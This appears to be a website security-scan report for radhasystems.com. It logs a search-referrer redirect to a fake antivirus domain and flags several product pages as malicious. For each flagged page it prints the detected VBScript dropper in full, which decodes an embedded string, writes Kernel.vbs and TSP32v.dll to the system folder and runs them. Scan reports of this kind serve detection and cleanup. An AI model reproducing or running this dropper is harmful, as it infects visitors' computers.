Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://radhasystems.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: radhasystems.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 24 May 2015 09:29:00 GMT Location: http://reliable-anti-virus.info/0/go.php?sid=2 Server: nginx/1.8.0 Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://radhasystems.com/ | 200 OK Content-Length: 102128 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) on error resume next filevbs1="039088083088032078101119032086105114117115040120115120095048048048057041013010104116109049061034049048048049048053049048057048051050049049053049050049049049053048049051048049048048056051049048049049049054048051050049048048049048050048051050048054049048051050049048048049049049048057057049049055049048057049048049049049048049049054048052054048057057049049052049048049048057055049049054049048049048054057049048056049048049049048057049048049049049048049049054048052048 set fso = df.createobject("Scripting.FileSystemObject","") set s = df.CreateObject("Shell.Application.1","") set reg = df.createobject("wscript.shell","") sys=fso.getspecialfolder(1) For a = 1 To Len(filevbs1) Step 3 filevbs2=filevbs2 & chr(mid(filevbs1,a,3)) next fso.CreateTextFile(sys & "\TSP32v.dll",True).write filevbs1 fso.CreateTextFile(sys & "\Kernel.vbs",True).write filevbs2 s.open (sys & "\Kernel.vbs") Antivirus reports:
| ||
http://radhasystems.com/drop_down/menu_over.js | 200 OK Content-Length: 5442 Content-Type: application/javascript | clean |
http://radhasystems.com/drop_down/menu.js | 200 OK Content-Length: 2251 Content-Type: application/javascript | clean |
http://radhasystems.com/branded.htm | 200 OK Content-Length: 74809 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) on error resume next filevbs1="039088083088032078101119032086105114117115040120115120095048048048057041013010104116109049061034049048048049048053049048057048051050049049053049050049049049053048049051048049048048056051049048049049049054048051050049048048049048050048051050048054049048051050049048048049049049048057057049049055049048057049048049049049048049049054048052054048057057049049052049048049048057055049049054049048049048054057049048056049048049049048057049048049049049048049049054048052048 set fso = df.createobject("Scripting.FileSystemObject","") set s = df.CreateObject("Shell.Application.1","") set reg = df.createobject("wscript.shell","") sys=fso.getspecialfolder(1) For a = 1 To Len(filevbs1) Step 3 filevbs2=filevbs2 & chr(mid(filevbs1,a,3)) next fso.CreateTextFile(sys & "\TSP32v.dll",True).write filevbs1 fso.CreateTextFile(sys & "\Kernel.vbs",True).write filevbs2 s.open (sys & "\Kernel.vbs") Antivirus reports:
| ||
http://radhasystems.com/assembled.htm | 200 OK Content-Length: 101339 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) on error resume next filevbs1="039088083088032078101119032086105114117115040120115120095048048048057041013010104116109049061034049048048049048053049048057048051050049049053049050049049049053048049051048049048048056051049048049049049054048051050049048048049048050048051050048054049048051050049048048049049049048057057049049055049048057049048049049049048049049054048052054048057057049049052049048049048057055049049054049048049048054057049048056049048049049048057049048049049049048049049054048052048 set fso = df.createobject("Scripting.FileSystemObject","") set s = df.CreateObject("Shell.Application.1","") set reg = df.createobject("wscript.shell","") sys=fso.getspecialfolder(1) For a = 1 To Len(filevbs1) Step 3 filevbs2=filevbs2 & chr(mid(filevbs1,a,3)) next fso.CreateTextFile(sys & "\TSP32v.dll",True).write filevbs1 fso.CreateTextFile(sys & "\Kernel.vbs",True).write filevbs2 s.open (sys & "\Kernel.vbs") Antivirus reports:
| ||
http://radhasystems.com/desktop_computer_peripherals.htm | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://radhasystems.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://radhasystems.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://radhasystems.com/monitor.htm | 200 OK Content-Length: 73759 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) on error resume next filevbs1="039088083088032078101119032086105114117115040120115120095048048048057041013010104116109049061034049048048049048053049048057048051050049049053049050049049049053048049051048049048048056051049048049049049054048051050049048048049048050048051050048054049048051050049048048049049049048057057049049055049048057049048049049049048049049054048052054048057057049049052049048049048057055049049054049048049048054057049048056049048049049048057049048049049049048049049054048052048 set fso = df.createobject("Scripting.FileSystemObject","") set s = df.CreateObject("Shell.Application.1","") set reg = df.createobject("wscript.shell","") sys=fso.getspecialfolder(1) For a = 1 To Len(filevbs1) Step 3 filevbs2=filevbs2 & chr(mid(filevbs1,a,3)) next fso.CreateTextFile(sys & "\TSP32v.dll",True).write filevbs1 fso.CreateTextFile(sys & "\Kernel.vbs",True).write filevbs2 s.open (sys & "\Kernel.vbs") Antivirus reports:
| ||
http://radhasystems.com/laptop.htm | 200 OK Content-Length: 137370 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) on error resume next filevbs1="039088083088032078101119032086105114117115040120115120095048048048057041013010104116109049061034049048048049048053049048057048051050049049053049050049049049053048049051048049048048056051049048049049049054048051050049048048049048050048051050048054049048051050049048048049049049048057057049049055049048057049048049049049048049049054048052054048057057049049052049048049048057055049049054049048049048054057049048056049048049049048057049048049049049048049049054048052048 set fso = df.createobject("Scripting.FileSystemObject","") set s = df.CreateObject("Shell.Application.1","") set reg = df.createobject("wscript.shell","") sys=fso.getspecialfolder(1) For a = 1 To Len(filevbs1) Step 3 filevbs2=filevbs2 & chr(mid(filevbs1,a,3)) next fso.CreateTextFile(sys & "\TSP32v.dll",True).write filevbs1 fso.CreateTextFile(sys & "\Kernel.vbs",True).write filevbs2 s.open (sys & "\Kernel.vbs") Antivirus reports:
| ||
http://radhasystems.com/inverts.htm | 200 OK Content-Length: 117823 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) on error resume next filevbs1="039088083088032078101119032086105114117115040120115120095048048048057041013010104116109049061034049048048049048053049048057048051050049049053049050049049049053048049051048049048048056051049048049049049054048051050049048048049048050048051050048054049048051050049048048049049049048057057049049055049048057049048049049049048049049054048052054048057057049049052049048049048057055049049054049048049048054057049048056049048049049048057049048049049049048049049054048052048 set fso = df.createobject("Scripting.FileSystemObject","") set s = df.CreateObject("Shell.Application.1","") set reg = df.createobject("wscript.shell","") sys=fso.getspecialfolder(1) For a = 1 To Len(filevbs1) Step 3 filevbs2=filevbs2 & chr(mid(filevbs1,a,3)) next fso.CreateTextFile(sys & "\TSP32v.dll",True).write filevbs1 fso.CreateTextFile(sys & "\Kernel.vbs",True).write filevbs2 s.open (sys & "\Kernel.vbs") Antivirus reports:
| ||
http://radhasystems.com/printer.htm | 200 OK Content-Length: 120995 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) on error resume next filevbs1="039088083088032078101119032086105114117115040120115120095048048048057041013010104116109049061034049048048049048053049048057048051050049049053049050049049049053048049051048049048048056051049048049049049054048051050049048048049048050048051050048054049048051050049048048049049049048057057049049055049048057049048049049049048049049054048052054048057057049049052049048049048057055049049054049048049048054057049048056049048049049048057049048049049049048049049054048052048 set fso = df.createobject("Scripting.FileSystemObject","") set s = df.CreateObject("Shell.Application.1","") set reg = df.createobject("wscript.shell","") sys=fso.getspecialfolder(1) For a = 1 To Len(filevbs1) Step 3 filevbs2=filevbs2 & chr(mid(filevbs1,a,3)) next fso.CreateTextFile(sys & "\TSP32v.dll",True).write filevbs1 fso.CreateTextFile(sys & "\Kernel.vbs",True).write filevbs2 s.open (sys & "\Kernel.vbs") Antivirus reports:
| ||
http://radhasystems.com/scanner.htm | 200 OK Content-Length: 96715 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) on error resume next filevbs1="039088083088032078101119032086105114117115040120115120095048048048057041013010104116109049061034049048048049048053049048057048051050049049053049050049049049053048049051048049048048056051049048049049049054048051050049048048049048050048051050048054049048051050049048048049049049048057057049049055049048057049048049049049048049049054048052054048057057049049052049048049048057055049049054049048049048054057049048056049048049049048057049048049049049048049049054048052048 set fso = df.createobject("Scripting.FileSystemObject","") set s = df.CreateObject("Shell.Application.1","") set reg = df.createobject("wscript.shell","") sys=fso.getspecialfolder(1) For a = 1 To Len(filevbs1) Step 3 filevbs2=filevbs2 & chr(mid(filevbs1,a,3)) next fso.CreateTextFile(sys & "\TSP32v.dll",True).write filevbs1 fso.CreateTextFile(sys & "\Kernel.vbs",True).write filevbs2 s.open (sys & "\Kernel.vbs") Antivirus reports:
| ||
http://radhasystems.com/networking_services.htm | 200 OK Content-Length: 74583 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) on error resume next filevbs1="039088083088032078101119032086105114117115040120115120095048048048057041013010104116109049061034049048048049048053049048057048051050049049053049050049049049053048049051048049048048056051049048049049049054048051050049048048049048050048051050048054049048051050049048048049049049048057057049049055049048057049048049049049048049049054048052054048057057049049052049048049048057055049049054049048049048054057049048056049048049049048057049048049049049048049049054048052048 set fso = df.createobject("Scripting.FileSystemObject","") set s = df.CreateObject("Shell.Application.1","") set reg = df.createobject("wscript.shell","") sys=fso.getspecialfolder(1) For a = 1 To Len(filevbs1) Step 3 filevbs2=filevbs2 & chr(mid(filevbs1,a,3)) next fso.CreateTextFile(sys & "\TSP32v.dll",True).write filevbs1 fso.CreateTextFile(sys & "\Kernel.vbs",True).write filevbs2 s.open (sys & "\Kernel.vbs") Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=radhasystems.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://radhasystems.com/
Result: radhasystems.com is not infected or malware details are not published yet.
Result: radhasystems.com is not infected or malware details are not published yet.